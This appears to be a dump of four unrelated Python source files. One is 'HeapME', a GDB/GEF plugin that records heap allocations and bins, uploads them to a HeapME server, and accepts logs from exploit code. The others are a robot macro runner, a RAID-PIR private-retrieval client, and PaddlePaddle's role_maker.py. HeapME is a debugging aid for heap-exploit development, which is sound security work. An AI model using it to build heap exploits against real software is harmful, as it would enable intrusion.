- GEF patches to allow scripts to register functions to malloc, calloc, realloc and free events.
- An HTTP Log Server will receive logs sent form the exploit code and upload them in the correct order.
@htejeda
"""
import time
import json
import requests
import socketio
import threading
import asyncio
import os
from aiohttp import web
heapme_is_authorized = False
heapme_is_running = False
sio = socketio.Client()
"""
Allow overriding default log listening host and port with environment variables
"""
LOG_SRV_HOST = os.getenv('LOG_SRV_HOST') or '127.0.0.1'
LOG_SRV_PORT = int(os.getenv('LOG_SRV_PORT') or 4327)
@register_command
class HeapMe(GenericCommand):
"""Heap Made Easy
init -- Connect to the HeapMe URL and begins tracking dynamic heap allocation
watch -- Updates the heap layout when this breakpoint is hit
push -- Uploads all events to the HeapME URL
"""
_cmdline_ = "heapme"
_syntax_ = "{:s} (init|watch|push)".format(_cmdline_)
def __init__(self):
super(HeapMe, self).__init__(prefix=True)
return
@only_if_gdb_running
def do_invoke(self, argv):
self.usage()
return
@register_command
class HeapMeInit(GenericCommand):
"""Connect to the HeapMe URL and begins tracking dynamic heap allocation"""
_cmdline_ = "heapme init"
_syntax_ = "{:s} <url> <id> <key>".format(_cmdline_)
_example_ = "{0:s} https://heapme.f2tc.com 5e7f8edea867881836775db1 e50b08b0-711c-11ea-9d36-a18c10d09858".format(_cmdline_)
@only_if_gdb_running
def do_invoke(self, argv):
if not argv or len(argv) != 3:
self.usage()
return
print(r"""
_ _ __ __ _____
| | | | ___ __ _ _ __ | \/ | ____|
| |_| |/ _ \/ _` | '_ \| |\/| | _|
| _ | __/ (_| | |_) | | | | |___
|_| |_|\___|\__,_| .__/|_| |_|_____|
|_|
""".center(40))
_heapme_url = argv[0]
_heapme_id = argv[1]
_heapme_key = argv[2]
if _heapme_url.endswith('/'):
_heapme_url = _heapme_url[:-1]
_heapme_url = "{0:s}/{1:s}/{2:s}".format(_heapme_url, _heapme_id, _heapme_key)
req = requests.get(_heapme_url)
data = req.json()
if 'result' in data:
warn("{0}: {1} - {2}".format(
Color.colorify("HeapME", "blue"),
Color.colorify(_heapme_url, "underline blue"),
Color.colorify(data['result'], "red")
))
return False
if not data['is_empty']:
if not self.confirm("oOps!, the specified URL contains data of previous analysis, do you want to overwrite it? [y/n] "):
print("Bye!")
return
sio.connect(_heapme_url)
sio.emit('address', { 'id': _heapme_id, 'key': _heapme_key })
while not heapme_is_authorized:
time.sleep(1)
ok("{0}: connected to {1}".format(
Color.colorify("HeapME", "blue"),
Color.colorify(argv[0], "underline blue"),
))
set_gef_setting("heapme.enabled", True, bool, "HeapME is Enabled")
set_gef_setting("heapme.verbose", False, bool, "HeapME verbose mode")
_sec = checksec(get_filepath())
heapme_push({
'type': 'begin',
'filepath': get_filepath(),
'checksec': {
'Canary': _sec["Canary"],
'NX': _sec["NX"],
'PIE': _sec["PIE"],
'Fortify': _sec["Fortify"],
'RelRO': "Full" if _sec["Full RelRO"] else "Partial" if _sec["Partial RelRO"] else "No"
}
})
gef_on_exit_hook(self.clean)
@gef_heap_event("__libc_malloc", "__libc_calloc", "__libc_realloc", "__libc_free")
def heap_event(**kwargs):
if not get_gef_setting("heapme.enabled"):
return
heapme_push({
"type": kwargs["name"],
"data": {
"address": kwargs["address"],
"size": -1 if kwargs["name"] == "__libc_free" else kwargs["size"]
}
})
heapme_update()
def confirm(self, msg):
valid = { "y": True, "yes": True, "n": False, "no": False }
while True:
choice = input(msg)
if choice in valid:
return valid[choice]
else:
print("Please respond with 'y' or 'n' (or 'yes' or 'no')")
def clean(self, event):
global heapme_is_running
print("Hold on, {0} is exiting cleanly".format(Color.colorify("HeapME", "blue")), end="...")
heapme_push({'type': 'done'})
sio.disconnect()
heapme_is_running = False
print("Adios!")
gef_on_exit_unhook(self.clean)
@register_command
class HeapMeWatch(GenericCommand):
"""Updates the heap layout when this breakpoint is hit"""
_cmdline_ = "heapme watch"
_syntax_ = "{:s} <address>".format(_cmdline_)
_example_ = "{0:s} *0x0xbadc0ffee0ddf00d".format(_cmdline_)
@only_if_gdb_running
def do_invoke(self, argv):
if not argv or len(argv) != 1:
self.usage()
return
if not get_gef_setting("heapme.enabled"):
return
HeapMeWatchAddress(argv[0])
ok("HeapMe will update the heap chunks when the {0:s} breakpoint is hit".format(Color.colorify(argv[0], "yellow")))
@register_command
class HeapMePush(GenericCommand):
"""Uploads all events to the HeapME URL"""
_cmdline_ = "heapme push"
_syntax_ = "{:s}".format(_cmdline_)
_example_ = "{0:s}".format(_cmdline_)
@only_if_gdb_running
def do_invoke(self, argv):
if not get_gef_setting("heapme.enabled"):
return
heapme_push()
@sio.event
def message(data):
global heapme_is_authorized
if type(data) is dict and data['authorized']:
heapme_is_authorized = True
return
else:
err("{0:s}: {1:s}".format(Color.colorify("HeapME", "blue"), data))
sio.disconnect()
print(data)
class HeapMeWatchAddress(gdb.Breakpoint):
def stop(self):
heapme_update()
return False
def _get_heap_segment():
heap_section = [x for x in get_process_maps() if x.path == "[heap]"]
if not heap_section:
#err("No heap section")
return
arena = get_main_arena()
if arena is None:
#err("No valid arena")
return
heap_section = heap_section[0].page_start
top_chunk_addr = int(arena.top)
view_size = (top_chunk_addr - heap_section + 16) / 8
cmd = "x/%dxg %s" % (view_size, heap_section)
heap_region = gdb.execute(cmd, to_string=True)
return heap_region
def heapme_update():
if not get_gef_setting("heapme.enabled"):
return
#Used to restore previous gef.disable_color setting
_prev_gef_disable_color = get_gef_setting("gef.disable_color")
#Temporarily disable color to simplify parsing
set_gef_setting("gef.disable_color", True)
arenas = {'type': 'arenas', 'data': False}
try:
arena = GlibcArena(__gef_default_main_arena__)
arenas = {'type': 'arenas', 'data': str(arena)}
except gdb.error:
arenas = {'type': 'arenas', 'data': False}
return
fast = gdb.execute("heap bins fast", to_string=True)
tcache = gdb.execute("heap bins tcache", to_string=True)
unsorted = gdb.execute("heap bins unsorted", to_string=True)
small = gdb.execute("heap bins small", to_string=True)
large = gdb.execute("heap bins large", to_string=True)
chunks = gdb.execute("heap chunks", to_string=True)
_new_event = [
arenas,
{ 'type':'fast', 'data': str(fast) },
{ 'type':'tcache', 'data': str(tcache) },
{ 'type':'unsorted', 'data': str(unsorted) },
{ 'type':'small', 'data': str(small) },
{ 'type':'large', 'data': str(large) },
{ 'type':'chunks', 'chunks_summary': str(chunks), 'data':_get_heap_segment() }
]
#Restore previous setting
set_gef_setting("gef.disable_color", _prev_gef_disable_color)
heapme_push(_new_event)
def heapme_push(heapme_events = False):
if type(heapme_events) is dict:
heapme_events = [ heapme_events ]
if not get_gef_setting("heapme.enabled") or not heapme_events:
return
if get_gef_setting("heapme.verbose"):
print("{0:s}: Uploading event".format(Color.colorify("HeapME", "blue")))
sio.emit('push', heapme_events)
def hm_log_server():
async def logHandler(request):
data = await request.json()
if not get_gef_setting("heapme.enabled"):
return
heapme_push({ 'type': 'log', 'data': data['msg'] })
return web.Response(text="OK")
app = web.Application()
app.add_routes([web.post('/', logHandler)])
runner = web.AppRunner(app)
return runner
def hm_run_log_server(runner):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(runner.setup())
site = web.TCPSite(runner, host=LOG_SRV_HOST, port=LOG_SRV_PORT)
loop.run_until_complete(site.start())
loop.run_forever()
t = threading.Thread(target=hm_run_log_server, args=(hm_log_server(),))
t.daemon = True
t.start()
register_external_command(HeapMe())
|
__init__.py
|
import threading
class AutonomousMode(object):
"""
Class for executing an autonomous mode. Usually done by executing macros.
"""
thread = None
running = False
def __init__(self):
self.running_macros = set()
def run_autonomous(self):
"""
Runs exec_autonomous in a new thread.
"""
self.thread = threading.Thread(target=self.exec_autonomous)
self.thread.start()
def exec_autonomous(self):
"""
Runs autonomous. This contains exception logic; subclasses
should override _exec_autonomous.
"""
self.running = True
try:
self._exec_autonomous()
except StopIteration:
pass
def _exec_autonomous(self):
"""
Runs autonomus. Override this.
Within this method, don't call macro.run or macro.execute directly, instead,
call self.run_macro or self.exec_macro in order to keep tabs on them
and stop the macros when this thread is stopped.
"""
pass
def stop_autonomous(self):
self.running = False
for macro in self.running_macros:
macro.kill()
self.running_macros.clear()
def exec_macro(self, macro):
"""
Executes a macro in the current thread.
Adds macro to self.running_macros when started,
removes it when finished.
If autonomous is stopped,
a StopIteration exception is raised in order to halt
exec_autonomous.
"""
if not self.running:
raise StopIteration()
self.running_macros.add(macro)
macro.reset()
macro.execute()
if macro in self.running_macros:
self.running_macros.remove(macro)
if not self.running:
raise StopIteration()
def run_macro(self, macro):
"""
Runs a macro in a separate thread.
Returns a handle to the thread.
"""
thread = threading.Thread(target=self.exec_macro, args=(macro, ))
thread.start()
return thread
class MacroSequence(AutonomousMode):
"""
Class for executing a series of macros sequentially.
"""
def __init__(self, macros=[]):
"""
Initializes Controller with an empty list of macros.
"""
self.macros = macros
super().__init__()
def add_macro(self, macro):
"""
Adds a macro to self.macros.
"""
self.macros.append(macro)
def _exec_autonomous(self):
"""
Iterates through the list of macros, resets them, then runs them sequentially.
"""
for macro in self.macros:
self.exec_macro(macro)
|
raidpir_client.py
|
#!/usr/bin/env python3
"""
<Author>
Daniel Demmler
(inspired from upPIR by Justin Cappos)
(inspired from a previous version by Geremy Condra)
<Date>
January 2019
<Description>
Client code for retrieving RAID-PIR files. This program uses a manifest
to communicate with a vendor and retrieve a list of mirrors. The client
then _privately_ downloads the appropriate files from mirrors in the mirror
list. None of the mirrors can tell what file or files were downloaded.
For more technical explanation, please see the paper.
<Usage>
see python raidpir_client.py --help
$ python raidpir_client.py
[--retrievemanifestfrom <IP>:<PORT>]
[-r <REDUNDANCY>]
[-R]
[-p]
[-b]
[-t]
[--vendorip <IP>]
file1 [file2 ...]
<Options>
See below
"""
# This file is laid out in two main parts. First, there are some helper
# functions to do moderately complex things like retrieving a block from a
# mirror or split a file into blocks. The second part contains the option
# parsing and main. To get an overall feel for the code, it is recommended
# to follow the execution from main on.
#
# EXTENSION POINTS:
#
# Making the client extensible is a major problem. In particular, we will
# need to modify mirror selection, block selection, malicious mirror detection,
# and avoiding slow nodes simultaneously. To do this effectively, we need
# some sort of mechanism that gives the programmer control over how to handle
# these.
#
# The XORRequestor interface is used to address these issues.
# The programmer defines an object that is provided the manifest,
# mirrorlist, and blocks to retrieve. The XORRequestor object must support
# several methods: get_next_xorrequest(), notify_failure(xorrequest),
# notify_success(xorrequest, xordata), and return_block(blocknum). The
# request_blocks_from_mirrors function in this file will use threads to call
# these methods to determine what to retrieve. The notify_* routines are
# used to inform the XORRequestor object of prior results so that it can
# decide how to issue future block requests. This separates out the 'what'
# from the 'how' but has a slight loss of control. Note that the block
# reconstruction, etc. is done here to allow easy extensibility of malicious
# mirror detection / vendor notification.
#
# The manifest file could also be extended to support huge files (those that
# span multiple releases). The client would need to download files from
# multiple releases and then stitch them back together. This would require
# minor changes (or possibly could be done using this code as a black box).
#
import sys
import optparse
# helper functions that are shared
import raidpirlib as lib
# used to issue requests in parallel
import threading
import simplexorrequestor
import session
# for basename
import os.path
# to sleep...
import time
_timer = lib._timer
def _request_helper(rxgobj, tid):
"""Private helper to get requests.
Multiple threads will execute this, each with a unique tid."""
thisrequest = rxgobj.get_next_xorrequest(tid)
#the socket is fixed for each thread, so we only need to do this once
socket = thisrequest[0]['sock']
# go until there are no more requests
while thisrequest != ():
bitstring = thisrequest[2]
try:
# request the XOR block...
lib.request_xorblock(socket, bitstring)
except Exception as e:
if 'socked' in str(e):
rxgobj.notify_failure(thisrequest)
sys.stdout.write('F')
sys.stdout.flush()
else:
# otherwise, re-raise...
raise
# regardless of failure or success, get another request...
thisrequest = rxgobj.get_next_xorrequest(tid)
# and that's it!
return
def _request_helper_chunked(rxgobj, tid):
"""Private helper to get requests with chunks.
Potentially multiple threads will execute this, each with a unique tid."""
thisrequest = rxgobj.get_next_xorrequest(tid)
#the socket is fixed for each thread, so we only need to do this once
socket = thisrequest[0]['sock']
rqtype = thisrequest[3] #the request type is also fixed
# go until there are no more requests
while thisrequest != ():
chunks = thisrequest[2]
try:
# request the XOR block...
if rqtype == 1: # chunks and seed expansion
lib.request_xorblock_chunked_rng(socket, chunks)
elif rqtype == 2: # chunks, seed expansion and parallel
lib.request_xorblock_chunked_rng_parallel(socket, chunks)
else: # only chunks (redundancy)
lib.request_xorblock_chunked(socket, chunks)
except Exception as e:
if 'socked' in str(e):
rxgobj.notify_failure(thisrequest)
sys.stdout.write('F')
sys.stdout.flush()
else:
# otherwise, re-raise...
raise
# regardless of failure or success, get another request...
thisrequest = rxgobj.get_next_xorrequest(tid)
# and that's it!
return
def request_blocks_from_mirrors(requestedblocklist, manifestdict, redundancy, rng, parallel):
"""
<Purpose>
Retrieves blocks from mirrors
<Arguments>
requestedblocklist: the blocks to acquire
manifestdict: the manifest with information about the release
<Side Effects>
Contacts mirrors to retrieve blocks. It uses some global options
<Exceptions>
TypeError may be raised if the provided lists are invalid.
socket errors may be raised if communications fail.
<Returns>
A dict mapping blocknumber -> blockcontents.
"""
# let's get the list of mirrors...
if _commandlineoptions.vendorip == None:
# use data from manifest
mirrorinfolist = lib.retrieve_mirrorinfolist(manifestdict['vendorhostname'], manifestdict['vendorport'])
else:
# use commandlineoption
mirrorinfolist = lib.retrieve_mirrorinfolist(_commandlineoptions.vendorip)
print("Mirrors: ", mirrorinfolist)
if _commandlineoptions.timing:
setup_start = _timer()
# no chunks (regular upPIR / Chor)
if redundancy == None:
# let's set up a requestor object...
rxgobj = simplexorrequestor.RandomXORRequestor(mirrorinfolist, requestedblocklist, manifestdict, _commandlineoptions.numberofmirrors, _commandlineoptions.batch, _commandlineoptions.timing)
if _commandlineoptions.timing:
setup_time = _timer() - setup_start
_timing_log.write(str(len(rxgobj.activemirrors[0]['blockbitstringlist']))+"\n")
_timing_log.write(str(len(rxgobj.activemirrors[0]['blockbitstringlist']))+"\n")
print("Blocks to request:", len(rxgobj.activemirrors[0]['blockbitstringlist']))
if _commandlineoptions.timing:
req_start = _timer()
# let's fire up the requested number of threads. Our thread will also participate (-1 because of us!)
for tid in range(_commandlineoptions.numberofmirrors - 1):
threading.Thread(target=_request_helper, args=[rxgobj, tid]).start()
_request_helper(rxgobj, _commandlineoptions.numberofmirrors - 1)
# wait for receiving threads to finish
for mirror in rxgobj.activemirrors:
mirror['rt'].join()
else: # chunks
# let's set up a chunk requestor object...
rxgobj = simplexorrequestor.RandomXORRequestorChunks(mirrorinfolist, requestedblocklist, manifestdict, _commandlineoptions.numberofmirrors, redundancy, rng, parallel, _commandlineoptions.batch, _commandlineoptions.timing)
if _commandlineoptions.timing:
setup_time = _timer() - setup_start
_timing_log.write(str(len(rxgobj.activemirrors[0]['blocksneeded']))+"\n")
_timing_log.write(str(len(rxgobj.activemirrors[0]['blockchunklist']))+"\n")
print("# Blocks needed:", len(rxgobj.activemirrors[0]['blocksneeded']))
if parallel:
print("# Requests:", len(rxgobj.activemirrors[0]['blockchunklist']))
#chunk lengths in BYTE
global chunklen
global lastchunklen
chunklen = (manifestdict['blockcount'] / 8) / _commandlineoptions.numberofmirrors
lastchunklen = lib.bits_to_bytes(manifestdict['blockcount']) - (_commandlineoptions.numberofmirrors-1)*chunklen
if _commandlineoptions.timing:
req_start = _timer()
# let's fire up the requested number of threads. Our thread will also participate (-1 because of us!)
for tid in range(_commandlineoptions.numberofmirrors - 1):
threading.Thread(target=_request_helper_chunked, args=[rxgobj, tid]).start()
_request_helper_chunked(rxgobj, _commandlineoptions.numberofmirrors - 1)
# wait for receiving threads to finish
for mirror in rxgobj.activemirrors:
mirror['rt'].join()
rxgobj.cleanup()
if _commandlineoptions.timing:
req_time = _timer() - req_start
recons_time, comptimes, pings = rxgobj.return_timings()
avg_ping = sum(pings) / _commandlineoptions.numberofmirrors
avg_comptime = sum(comptimes) / _commandlineoptions.numberofmirrors
_timing_log.write(str(setup_time)+ "\n")
_timing_log.write(str(req_time)+ "\n")
_timing_log.write(str(recons_time)+ "\n")
_timing_log.write(str(avg_comptime)+ " " + str(comptimes)+ "\n")
_timing_log.write(str(avg_ping)+ " " + str(pings)+ "\n")
# okay, now we have them all. Let's get the returned dict ready.
retdict = {}
for blocknum in requestedblocklist:
retdict[blocknum] = rxgobj.return_block(blocknum)
return retdict
def request_files_from_mirrors(requestedfilelist, redundancy, rng, parallel, manifestdict):
"""
<Purpose>
Reconstitutes files by privately contacting mirrors
<Arguments>
requestedfilelist: the files to acquire
redundancy: use chunks and overlap this often
rng: use rnd to generate latter chunks
parallel: query one block per chunk
manifestdict: the manifest with information about the release
<Side Effects>
Contacts mirrors to retrieve files. They are written to disk
<Exceptions>
TypeError may be raised if the provided lists are invalid.
socket errors may be raised if communications fail.
<Returns>
None
"""
neededblocks = []
#print "Request Files:"
# let's figure out what blocks we need
for filename in requestedfilelist:
theseblocks = lib.get_blocklist_for_file(filename, manifestdict)
# add the blocks we don't already know we need to request
for blocknum in theseblocks:
if blocknum not in neededblocks:
neededblocks.append(blocknum)
# do the actual retrieval work
blockdict = request_blocks_from_mirrors(neededblocks, manifestdict, redundancy, rng, parallel)
# now we should write out the files
for filename in requestedfilelist:
filedata = lib.extract_file_from_blockdict(filename, manifestdict, blockdict)
# let's check the hash
thisfilehash = lib.find_hash(filedata, manifestdict['hashalgorithm'])
for fileinfo in manifestdict['fileinfolist']:
# find this entry
if fileinfo['filename'] == filename:
if thisfilehash == fileinfo['hash']:
# we found it and it checks out!
break
else:
raise Exception("Corrupt manifest has incorrect file hash despite passing block hash checks!")
else:
raise Exception("Internal Error: Cannot locate fileinfo in manifest!")
# open the filename w/o the dir and write it
filenamewithoutpath = os.path.basename(filename)
open(filenamewithoutpath, "wb").write(filedata)
print("wrote", filenamewithoutpath)
########################## Option parsing and main ###########################
_commandlineoptions = None
def parse_options():
"""
<Purpose>
Parses command line arguments.
<Arguments>
None
<Side Effects>
All relevant data is added to _commandlineoptions
<Exceptions>
These are handled by optparse internally. I believe it will print / exit
itself without raising exceptions further. I do print an error and
exit if there are extra args...
<Returns>
The list of files to retrieve
"""
global _commandlineoptions
# should be true unless we're initing twice...
assert _commandlineoptions == None
parser = optparse.OptionParser()
parser.add_option("", "--retrievemanifestfrom", dest="retrievemanifestfrom",
type="string", metavar="vendorIP:port", default="",
help="Specifies the vendor to retrieve the manifest from (default None).")
parser.add_option("", "--printfilenames", dest="printfiles",
action="store_true", default=False,
help="Print a list of all available files in the manifest file.")
parser.add_option("", "--vendorip", dest="vendorip", type="string", metavar="IP",
default=None, help="Vendor IP for overwriting the value from manifest; for testing purposes.")
parser.add_option("-m", "--manifestfile", dest="manifestfilename",
type="string", default="manifest.dat",
help="The manifest file to use (default manifest.dat).")
parser.add_option("-k", "--numberofmirrors", dest="numberofmirrors",
type="int", default=2,
help="How many servers do we query? (default 2)")
parser.add_option("-r", "--redundancy", dest="redundancy",
type="int", default=None,
help="Activates chunks and specifies redundancy r (how often they overlap). (default None)")
parser.add_option("-R", "--rng", action="store_true", dest="rng", default=False,
help="Use seed expansion from RNG for latter chunks (default False). Requires -r")
parser.add_option("-p", "--parallel", action="store_true", dest="parallel", default=False,
help="Query one block per chunk in parallel (default False). Requires -r")
parser.add_option("-b", "--batch", action="store_true", dest="batch", default=False,
help="Request the mirror to do computations in a batch. (default False)")
parser.add_option("-t", "--timing", action="store_true", dest="timing", default=False,
help="Do timing measurements and print them at the end. (default False)")
parser.add_option("-c", "--comment", type="string", dest="comment", default="",
help="Debug comment on this run, used to name timing log file.")
# let's parse the args
(_commandlineoptions, remainingargs) = parser.parse_args()
# Force the use of a seeded rng (-R) if MB (-p) is used. Temporary, until -p without -R is implemented.
if _commandlineoptions.parallel:
_commandlineoptions.rng = True
# sanity check parameters
# k >= 2
if _commandlineoptions.numberofmirrors < 2:
print("Mirrors to contact must be > 1")
sys.exit(1)
# r >= 2
if _commandlineoptions.redundancy != None and _commandlineoptions.redundancy < 2:
print("Redundancy must be > 1")
sys.exit(1)
# r <= k
if _commandlineoptions.redundancy != None and (_commandlineoptions.redundancy > _commandlineoptions.numberofmirrors):
print("Redundancy must be less or equal to number of mirrors (", _commandlineoptions.numberofmirrors, ")")
sys.exit(1)
# RNG or parallel query without chunks activated
if (_commandlineoptions.rng or _commandlineoptions.parallel) and not _commandlineoptions.redundancy:
print("Chunks must be enabled and redundancy set (-r <number>) to use RNG or parallel queries!")
sys.exit(1)
if len(remainingargs) == 0 and _commandlineoptions.printfiles == False:
print("Must specify at least one file to retrieve!")
sys.exit(1)
#filename(s)
_commandlineoptions.filestoretrieve = remainingargs
def start_logging():
global _timing_log
global total_start
logfilename = time.strftime("%y%m%d") + "_" + _commandlineoptions.comment
logfilename += "_k" + str(_commandlineoptions.numberofmirrors)
if _commandlineoptions.redundancy:
logfilename += "_r" + str(_commandlineoptions.redundancy)
if _commandlineoptions.rng:
logfilename += "_R"
if _commandlineoptions.parallel:
logfilename += "_p"
if _commandlineoptions.batch:
logfilename += "_b"
cur_time = time.strftime("%y%m%d-%H%M%S")
_timing_log = open("timing_" + logfilename + ".log", "a")
_timing_log.write(cur_time + "\n")
_timing_log.write(str(_commandlineoptions.filestoretrieve) + " ")
_timing_log.write(str(_commandlineoptions.numberofmirrors) + " ")
_timing_log.write(str(_commandlineoptions.redundancy) + " ")
_timing_log.write(str(_commandlineoptions.rng) + " ")
_timing_log.write(str(_commandlineoptions.parallel) + " ")
_timing_log.write(str(_commandlineoptions.batch) + "\n")
total_start = _timer()
def main():
"""main function with high level control flow"""
# If we were asked to retrieve the mainfest file, do so...
if _commandlineoptions.retrievemanifestfrom:
# We need to download this file...
rawmanifestdata = lib.retrieve_rawmanifest(_commandlineoptions.retrievemanifestfrom)
# ...make sure it is valid...
manifestdict = lib.parse_manifest(rawmanifestdata)
# ...and write it out if it's okay
open(_commandlineoptions.manifestfilename, "wb").write(rawmanifestdata)
else:
# Simply read it in from disk
rawmanifestdata = open(_commandlineoptions.manifestfilename, "rb").read()
manifestdict = lib.parse_manifest(rawmanifestdata)
# we will check that the files are in the release
# find the list of files
filelist = lib.get_filenames_in_release(manifestdict)
if (manifestdict['blockcount'] < _commandlineoptions.numberofmirrors * 8) and _commandlineoptions.redundancy != None:
print("Block count too low to use chunks! Try reducing the block size or add more files to the database.")
sys.exit(1)
if _commandlineoptions.printfiles:
print("Manifest - Blocks:", manifestdict['blockcount'], "x", manifestdict['blocksize'], "Byte - Files:\n", filelist)
if _commandlineoptions.timing:
_timing_log.write(str(manifestdict['blocksize']) + "\n")
_timing_log.write(str(manifestdict['blockcount']) + "\n")
# ensure the requested files are in there...
for filename in _commandlineoptions.filestoretrieve:
if filename not in filelist:
print("The file", filename, "is not listed in the manifest.")
sys.exit(2)
# don't run PIR if we're just printing the filenames in the manifest
if len(_commandlineoptions.filestoretrieve) > 0:
request_files_from_mirrors(_commandlineoptions.filestoretrieve, _commandlineoptions.redundancy, _commandlineoptions.rng, _commandlineoptions.parallel, manifestdict)
if __name__ == '__main__':
print("RAID-PIR Client", lib.pirversion)
parse_options()
if _commandlineoptions.timing:
start_logging()
main()
if _commandlineoptions.timing:
ttime = _timer() - total_start
_timing_log.write(str(ttime)+ "\n")
_timing_log.close()
|
role_maker.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of Role Makers."""
import os
import time
import numpy as np
import warnings
from multiprocessing import Process, Manager
import paddle
import paddle.fluid as fluid
from paddle.distributed.fleet.base.private_helper_function import wait_server_ready
class Role:
WORKER = 1
SERVER = 2
HETER_WORKER = 3
ALL = 4
class Gloo(object):
"""
Gloo is a universal class for barrier and collective communication
"""
class RENDEZVOUS:
HDFS = 1
FILE = 2
HTTP = 3
def __init__(self):
self._worker_comm = None
self._server_comm = None
self._nodes_comm = None
self._comm_world = ["worker", "server", "all"]
self._err_init = "gloo is not initialized, will not communicator with other nodes"
self._err_type = "gloo initialized error, please check arguments"
self._err_world = "argument error, comm_world must in {}".format(
self._comm_world)
self._is_initialized = False
self._init_timeout_seconds = 3600
self._run_timeout_seconds = 9999999
self._rendezvous = None
self._role = None
self._iface = None
self._role_id = -1
self._worker_num = -1
self._server_num = -1
self._need_init_all = False
def init(self,
rendezvous,
role,
role_id,
worker_num,
server_num,
need_init_all=False,
kwargs=None):
self._rendezvous = rendezvous
self._role = role
self._role_id = role_id
self._worker_num = worker_num
self._server_num = server_num
self._need_init_all = need_init_all
self._iface = ""
self._prefix = kwargs.get("store.prefix", "")
http_server = None
if self._rendezvous == Gloo.RENDEZVOUS.HDFS:
dfs_name = kwargs.get("dfs.name", "")
dfs_ugi = kwargs.get("dfs.ugi", "")
dfs_path = kwargs.get("dfs.path", "")
if not dfs_name or not dfs_ugi or not dfs_path:
raise ValueError(self._err_type)
self._init_dfs(dfs_name, dfs_ugi, dfs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.FILE:
fs_path = kwargs.get("dfs.path", "")
if not fs_path:
raise ValueError(self._err_type)
self._init_fs(fs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.HTTP:
ip = kwargs.get("http.host", "")
port = kwargs.get("http.port", "")
start_http_server = kwargs.get("start_http_server", False)
http_server_d = kwargs.get("http_server_d")
if not ip or not port:
raise ValueError(self._err_type)
http_server = self._init_http(ip, port, self._prefix,
start_http_server, http_server_d)
else:
raise ValueError(self._err_type)
self._is_initialized = True
self._http_server = http_server
def _init_fs(self, fs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(fs_path, role), "", "")
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_dfs(self, dfs_name, dfs_ugi, dfs_path, prefix):
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_hdfs_store(os.path.join(dfs_path, role), dfs_name, dfs_ugi)
gloo.init()
return gloo
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
def _init_http(self, ip, port, prefix, start_http_server, http_server_d):
def __start_kv_server(http_server_d, size_d):
from paddle.distributed.fleet.utils.http_server import KVServer
http_server = KVServer(port, size_d)
http_server.start()
wait_seconds = 5
while http_server_d.get("running", False):
time.sleep(wait_seconds)
http_server.stop()
def init_kv_server(http_server_d):
size_d = {
"trainer": self._worker_num,
"pserver": self._server_num,
"all": self._worker_num + self._server_num
}
http_server_d["running"] = True
# child process for http server
_http_server = Process(
target=__start_kv_server, args=(http_server_d, size_d))
_http_server.daemon = True
# set running status to True
# start child process
_http_server.start()
return _http_server
def init(rank, nodes, role):
gloo = fluid.core.Gloo()
gloo.set_rank(rank)
gloo.set_size(nodes)
gloo.set_prefix(prefix)
gloo.set_iface(self._iface)
gloo.set_timeout_seconds(self._init_timeout_seconds,
self._run_timeout_seconds)
gloo.set_http_store(ip, port, role)
ep = ":".join([ip, str(port)])
wait_server_ready([ep])
gloo.init()
return gloo
port = int(port)
if start_http_server:
http_server = init_kv_server(http_server_d)
if self._role == Role.WORKER:
rank, nodes = self._get_rank_nodes(Role.WORKER)
gloo = init(rank, nodes, "WORKER")
self._worker_comm = gloo
else:
rank, nodes = self._get_rank_nodes(Role.SERVER)
gloo = init(rank, nodes, "SERVER")
self._server_comm = gloo
if self._need_init_all:
rank, nodes = self._get_rank_nodes(Role.ALL)
gloo = init(rank, nodes, "ALL")
self._nodes_comm = gloo
if start_http_server:
http_server_d["running"] = False
http_server.join()
def _get_rank_nodes(self, role):
nodes = 0
rank = -1
if role == Role.WORKER:
nodes = self._worker_num
rank = self._role_id
elif role == Role.SERVER:
nodes = self._server_num
rank = self._role_id
elif role == Role.ALL:
nodes = self._worker_num + self._server_num
if self._role == Role.WORKER:
rank = self._role_id
else:
rank = self._worker_num + self._role_id
else:
ValueError(self._err_type)
return rank, nodes
def __get_default_iface(self):
"""
get default physical interface
"""
default1 = self.__get_default_iface_from_gateway()
default2 = self.__get_default_iface_from_interfaces()
return default2 if default1 == "lo" else default1
def __get_default_iface_from_gateway(self):
"""
get default physical interface
"""
res = os.popen("route -A inet").read().strip().split("\n")
gateway_idx = None
iface_idx = None
for item in res:
item = item.split()
if "Gateway" in item and "Iface" in item:
gateway_idx = item.index("Gateway")
iface_idx = item.index("Iface")
elif gateway_idx != None and iface_idx != None:
gateway = None
if len(item) > gateway_idx:
gateway = item[gateway_idx]
if gateway and gateway != '*' and gateway != "0.0.0.0" and len(
item) > iface_idx:
return item[iface_idx]
return "lo"
